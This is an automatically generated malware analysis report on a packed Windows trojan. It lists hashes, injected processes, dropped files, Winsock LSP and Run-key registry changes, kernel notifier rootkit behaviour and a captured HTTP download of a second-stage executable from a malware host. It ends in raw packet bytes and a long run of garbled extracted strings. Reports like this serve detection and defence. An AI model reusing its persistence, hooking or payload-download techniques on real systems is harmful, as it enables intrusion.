Gen.Trojan.Heur.RP.FWaadPfKpj_67f845b640

by malwarelabrobot on January 19th, 2017 in Malware Descriptions.

Gen:Trojan.Heur.RP.@FW@aadPfKpj (B) (Emsisoft), Gen:Trojan.Heur.RP.@FW@aadPfKpj (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 67f845b6404d088455a9baa5c2d9ec9e
SHA1: 9169a915bd58533472233cdcb3993dcfb61dc54f
SHA256: ec7db15e88545465e16da54978dae8257fe8f191794ae3ee9f2d45100726dc05
SSDeep: 98304:PmXu3VSiI1ssZu5zujFdBvgggd5ZPlbRXjnbek8:OeF3WDBvYd5RFRXTb6
Size: 5017088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 2017-01-03 15:06:51
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

winnet.exe:1248
Intel.exe:1900

The Trojan injects its code into the following process(es):

%original file name%.exe:2956
Reality.log:1796
pack11.exe:3608

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.sys (20 bytes)
C:\Windows\winnet.dll (124 bytes)
C:\Windows\winnet.exe (70 bytes)
C:\Windows\System32\config\SYSTEM.LOG1 (7918 bytes)
C:\$Directory (2304 bytes)
C:\Windows\System32\config\SYSTEM (5748 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.exe (127 bytes)

The process pack11.exe:3608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process winnet.exe:1248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\winnet.dll (126 bytes)
C:\Windows\LSP.dll (88 bytes)

The process Intel.exe:1900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pack11.exe (7427 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\pack11[1].exe (6835 bytes)

Registry activity

The process %original file name%.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\Intel\Instances\Intel Instance]
"Flags" = "0"

[HKLM\System\CurrentControlSet\services\Intel\Instances]
"DefaultInstance" = "Intel Instance"

[HKLM\System\CurrentControlSet\services\Intel\Instances\Intel Instance]
"Altitude" = "370033"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process winnet.exe:1248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000022]
"ProtocolName" = "LR_LSP"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"ProtocolName" = "@%SystemRoot%\System32\wshtcpip.dll,-60101"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-100"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000024]
"ProtocolName" = "LR_LSP"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000024]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 4C 53 50 2E 64"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-101"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1124"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000018]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-103"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{BDC8D276-A5D8-4E4C-8EB2-2752A8E55337}] SEQPACKET 2"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000023]
"ProtocolName" = "LR_LSP"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Num_Catalog_Entries" = "21"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
"ProtocolName" = "@%SystemRoot%\System32\wship6.dll,-60100"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-102"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{03967CDD-F8BD-4AC9-8369-0D2BD8F246F5}] DATAGRAM 1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000021]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 4C 53 50 2E 64"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{03967CDD-F8BD-4AC9-8369-0D2BD8F246F5}] SEQPACKET 1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000018]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{FB1DE278-988C-428A-AF16-245107A1AA49}] DATAGRAM 3"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip_{03967CDD-F8BD-4AC9-8369-0D2BD8F246F5}] DATAGRAM 0"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000021]
"ProtocolName" = "LR_LSP"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000020]
"ProtocolName" = "VMCI sockets STREAM"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Serial_Access_Num" = "43"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000019]
"ProtocolName" = "VMCI sockets DGRAM"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{BDC8D276-A5D8-4E4C-8EB2-2752A8E55337}] DATAGRAM 2"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000020]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000019]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000023]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 4C 53 50 2E 64"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"ProtocolName" = "@%SystemRoot%\System32\wshtcpip.dll,-60102"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{FB1DE278-988C-428A-AF16-245107A1AA49}] SEQPACKET 3"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip_{03967CDD-F8BD-4AC9-8369-0D2BD8F246F5}] SEQPACKET 0"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"ProtocolName" = "@%SystemRoot%\System32\wship6.dll,-60101"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000022]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 4C 53 50 2E 64"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"ProtocolName" = "@%SystemRoot%\System32\wshtcpip.dll,-60100"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"ProtocolName" = "@%SystemRoot%\System32\wship6.dll,-60102"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000024]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000023]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000018]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000019]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000022]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
[HKLM\System\CurrentControlSet\services\WinSock2\Parameters\Protocol_Catalog9\0000002C]
[HKLM\System\CurrentControlSet\services\WinSock2\Parameters\Protocol_Catalog9\0000002B]
[HKLM\System\CurrentControlSet\services\WinSock2\Parameters\Protocol_Catalog9\0000002A]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000021]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000020]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]

The process Intel.exe:1900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"EnableConsoleTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"INTEL" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
03743259b426d308769257cb9ed9e93f c:\Windows\LSP.dll
c0cef56783f492e1e9f29a6f15848b74 c:\Windows\winnet.dll
7c184ba0b79448b278caef6895ac6cf4 c:\Windows\winnet.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.sys" the Trojan controls the loading of executable images into memory by installing a load-image notifier.
Using the driver "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.sys" the Trojan controls operations on the system registry by installing a registry notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 34759 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 40960 10454 0 0 d41d8cd98f00b204e9800998ecf8427e
.data 53248 12268 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp0 65536 5256863 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp1 5324800 4729192 4729344 5.38718 4fb51347839a3806d70ae489fa68c00b
.reloc 10055680 244 512 2.07686 2f5a7d0f98be02539885a12becc5f6db
.rsrc 10059776 286205 286208 1.886 5365c5f5ef46ff9112f3b8db23e27491

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.dresou.net/pack11.exe 47.90.18.203
www.wdcrf.net 43.241.50.128


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CURRENT_EVENTS Possible Malicious Macro EXE DL AlphaNumL
ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /pack11.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.dresou.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 42496
Content-Type: application/octet-stream
Last-Modified: Tue, 06 Dec 2016 06:37:42 GMT
Accept-Ranges: bytes
ETag: "07fcf3e8b4fd21:6ab"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 18 Jan 2017 05:33:58 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......)...............(.......................-.....................Ri
ch....................PE..L...N..W............................p:......
.@....@..........................P............@.......................
...........B.......@.......................C..........................
............4<..H...........................................UPX0...
.................................UPX1................................@
....rsrc........@......................@..............................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..........3.91.UPX!....r&.\...1....o.......&..{....U.....SV.5....... .
3.W..3..]..........|#.F....@.....4.......m{..Q..U....Hu..'..~.........
....E.......t.....................I._..^..[..]..........o...Ut-.......
........HTTP/1.1 200 OK..Content-Length: 42496..Content-Type: applicat
ion/octet-stream..Last-Modified: Tue, 06 Dec 2016 06:37:42 GMT..Accept
-Ranges: bytes..ETag: "07fcf3e8b4fd21:6ab"..Server: Microsoft-IIS/6.0.
.X-Powered-By: ASP.NET..Date: Wed, 18 Jan 2017 05:33:58 GMT..MZ.......
...............@...............................................!..

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_2956:

.text
`.rdata
@.data
.vmp0
.vmp1
.reloc
@.rsrc
GetProcessWindowStation
Reality.log
D:\chengzhen\DNF\StartGame\Release\StartGame.pdb
C:\OneRun.txt
360tcpview
365tcpview
cports
tcpview
c:\%original file name%.exe
zr_]UbN
.xV``
.YB}n=
.uBs{(JBq
&.uFi
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
USER32.DLL
operator
activation.php?code=
deactivation.php?hash=
y2.eu:
.?AVIUrlBuilderSource@@
` Bb]%X
.Ujb!7l$_s
.jbBA
uDp'\T?UT6
^U.Qf
/.XZViC
"%1zqQ.Rog$
YQ.EM6
$[.zZ9)~M
-%fT\;Q
L.rg-
%F/.0
(nF%sr5-
Y<ÚK
.ToDLCF
Q.EMN
-r.arz%l\
".qZE=
_DsSH[Tq
M:.yjJu|h# 
\TCpAIN
v.uYQ2Ls
VeRr%3x 
.utDd'3|
m&y.Wh{(
7h}%f
".qPd
.Wh2N
xX_C~^%xtC
Ni%f*
.uJjQ?p8_
.so$:evV=
&.yxHh7
xOKCXQai.EMf
MfY2M2.af
Ee.cS[4'
r.uYQ>
$kdDw#hp .hJ
5va.Ire&YF
).yb-~
5NCsSH
-b}u6
&.YqLl 
]:.aq2
".yU~F
6 ]em.Poh
kc(>m&.UT
n.yU]"
.ek4'/`x
.YJIZ-
.qbj)
c.zrA
V^%dT\C
!~Q.IreFg(
0OZjb=
(c.zrE
>U!-b}6u
(oe2.yTp?
}.yb-{
^.px3
<c.zZa2:e
_@.qe
'gi.de
z-b}u
Mf:m%fz%
i.EMV
e.EeF
wPAE%uz
V^Ð
HkXPCNZ5&.UTdl
n%Ux 
Jm%f| 
8"th/%fn
&.yxH@_3Lck<3l
C8 s)z.yi6"e
`em.DE'
X !j~_:
J%Dpx
L^.px
.MEnc7?|
.AVme&k?
via:.yoD
 dt#4<[.zrA
.Yn_W0
4[.zr
-BP2}6
V^Ð8O>2
.zZE< w
0/'l=ia.Ee*`
.yFf=`?
M2.aL@W
%fOk,WX
-Mm}u
)r-%f
Rr_]Ufk?
]2.qa"
.yb1bA
uQ.IBUB]V
`a%fh3_-
%7U}u2
QY.Ee6
|?p{(M:.eb
".qPL3l
/.XT?
W8.anNa
dUI6i.aB
-2}JjE-^qQZ
n^V-%fp,
rs/.yM
.meF$
{.IY(ssp
.iw(W_0;3PCL
f!V^%dT\W
ck4g(s0U.aF
)gQ^TcPp f2:Q
}.yb-V=
&.iw(v
%fyq&Y
9RM6a.Ify
.iPdC
.zr-ZR]
.YBYbU
&.im%
Kd_Lq.OTo$
}.un1z=
.ie_Z
&.YDHoWa
m&.wJ
.XT7?P
%FY:s
}.qy&4gZ
vj=w
P<.leTI_-
C".qPd7
S@.iq
&e.EM>s'
.eixn
~„c_
u.ybY
bZ5Oy&b%dH{m
e.anf9x,$
UT".iRAL
kGp/.XT[ 
h`7r&.ir
j$=z.ue:
.iPdO
.iNEj)
V^%dT\ @`G
S-j}]2wGg,
CZ.pPS/
Z5%fH
.iD`W
.evV=
.TS\E
uAz.qbjU
(m4.TA
".ab9)f
.uFukjg
071=^6<7<
QT".qe
nfÐ
FfÐ
2.eA{'nS
=r.iPdC
.Yj)R5
cU.Ee
5z.qa
%DL;gZ
e2.qa"
7l?h[Hm.aN
c'TCpx
NJ= \Ÿ
kKpy-%f
}Y.aR
&.iw<
&.uJjA
%fqQf<s/
kV|9.tPG
Wd<o%ft'
Q:d~ykc@.YfFU}
pP7r&.iq
sSHW<
S[0y-%f[GD
/\-yY.de
"U].UdDG
%F}uB
-ytu}
'|sSHr%
9b".aJIZE~
d.NeRr9
aEr.uc4
H^.px
^5-j}
"U.bQ
}V^%dTtC
.Tp';
>6UbSsH
V-&.irz-"u
.IqC~
.ab9p@H?."}
-G.RU
}.ybM
BJU\lLC".qy*
}.qy&4gNjE
g~v%dT
.qD`/?
q.uTK
U:v.Mai
i2.eu>
!;m.GKR
h.jls
.hsPb3
.hsPf5a
.hC:f
_qf%xrb
|e.eZ*
Js%sX
.odTa
.HA; 
`h%fp
.oVSa
d1.Zf.
nB.MCU
.UC\&
&.Zf*L
|e.uE
%SqM:2
.VRKHV=
V|"'mOusSh
4 `h%fp
|^.dd
.Nn59
{.UFt
-l%d)
.IC\&
.zq)y6
B;3%x
bBE.rcD
.FM\m
.g(%d,dc
s9G.lB,
uudPC
Kqñ*
>-%x(
.gJw/
\.vN%
.YRKBf
H%U|[
H%Us[
).JS3
'%X~&
/.DTa
8U.VBF
z31 e.VB
L.za=
.Aye?$
.DFIM
}-Sh}m
JFtp
$]%D#X
|e.VR
!C.YB
dR.XE
I!K.bB
JP%d,
Q%c:x
;lz%u
vrý
trK%U
ryf=.wKH?
s-E}.
nd.va
5<.tj
Q/}
.U%D$9
.Zl@ h;
BZ.ti
DD.ZZ
pj.YK&
 *%sVO6
J.Bx=
`%s},
.GDZe
.Bg=I
3@F%x
F.uljH
w.LXVL
oC%d@
).cuP
3.vUu
>Z.Dq
.MDRw
{?a%u_
K\X.emh
2^:_56!5
%X#X2Vy8h
yFTP
/.Lec
wW%sw8;x$
.lcHp
X\%dZ
t%fnL
dessH
(1.Wl:
`.pLv
}gq%Xp
h\1(.zU
I`.PkG
%X@X!(j
%u6mO.
H\.kH@
TH 9EXe
.MvV`
UXY.uE
.ly1z
%c!OA
JExE
.GXoj
Dg.pL
x_.Xw
.Cxs#
c4.XC
.UE%3
H.Ib*OE
s.Qa4KG
*0%UtR
d\).zO
@%fpL1
F24
.SLOL
%Sk%6
%4.d{
Cz:%C
*M.QS~
%Fu^gw
%XSP}
>ge.DM
x*O2%U
-3}xH
u7H%S
c%x0.
~d.hz
RL
G,Y%U
M.hzc
.CL",
.Any1V
bB$,F
.DBE:
%u@-N
fJi.FH
.Hy6e
8Tt%u)
.MU_(
[{%fH#d
r4)%UG
.lD?g3w
#(.HS
tweb
.mQH5
.yi,Q
U%c*P
Z/.kY]
wBZ.cw
K%U=-
.BU{,i
a=%do5
Wpmsg
(.une`
H%U-=
wBZ.cs
6J<.GWy
wBZ.wJ
.UMTa
UgO.eQ
%Dk*qH
1%XWw
99.%F
.uk@B
AjT%s
5>%F"2
ftPy
=X-Q}
eG.uN
.QU=~
W`~%xx
ÞJ6
4n!.kT "
T%S0F?V
pI%SmJ*^
%Ubq%
X%Djy[
=.ptS
#&.ns
.XMTa
.Nr_d
o.PVX
,p3%x
d%s15(
.zVZ?
G.dV'
QweB0
d=cüi
g|%Cv
=.aG)c
iSTZ%u
8 IK3%d
#%fW[iG
T{%S8
M:.hP
W$.wI/i
AA.pV
jZ.znI
%D-m=
Zg-A}
}*r%d/
.>t%f(
d.ck3p
.Ej#6`
nob.wX`#j
%a.dp
.qI-K
? .RMTaG
"Tdb.wY
.RMTa/{U
hSZ.eG
5"C
5-w6}
